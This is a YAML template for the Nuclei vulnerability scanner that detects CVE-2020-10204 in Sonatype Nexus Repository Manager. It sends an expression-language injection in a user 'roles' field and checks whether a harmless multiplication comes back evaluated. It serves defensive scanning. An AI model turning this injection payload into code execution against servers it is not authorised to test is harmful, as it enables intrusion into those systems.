nuclei-templates/cves/CVE-2020-10204.yaml

26 lines
1015 B
YAML

id: CVE-2020-10204
info:
name: Sonatype Nexus Repository RCE
auhtor: hetroublemakr
severity: high
description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/extdirect'
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 200